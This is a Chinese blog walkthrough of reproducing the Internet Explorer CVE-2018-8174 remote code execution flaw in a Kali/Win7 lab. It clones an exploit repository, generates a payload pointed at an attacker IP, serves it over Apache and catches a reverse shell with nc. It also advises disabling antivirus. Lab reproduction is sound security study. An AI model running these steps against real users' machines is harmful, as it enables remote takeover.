IE瀏覽器 CVE-2018-8174漏洞復現

漏洞介紹
CVE2018-8174這個漏洞是針對ie瀏覽器的一個遠程代碼執行漏洞
復現環境
kali
win7
復現
克隆文件

git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

在這裏插入圖片描述
生成

python CVE-2018-8174.py -u http://192.168.31.117/exploit.html -o exploit.rtf -i 192.168.31.117 -p 7777

在這裏插入圖片描述
將文件移動到html下嗎,啓動apache2

/etc/init.d/apache2 start

在這裏插入圖片描述
監聽端口

nc -vlp 7777

在這裏插入圖片描述

靶機ie訪問
http://192.168.31.117/exploit.html
在這裏插入圖片描述
注:復現時關閉主機火絨,虛擬機內也會被殺;

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章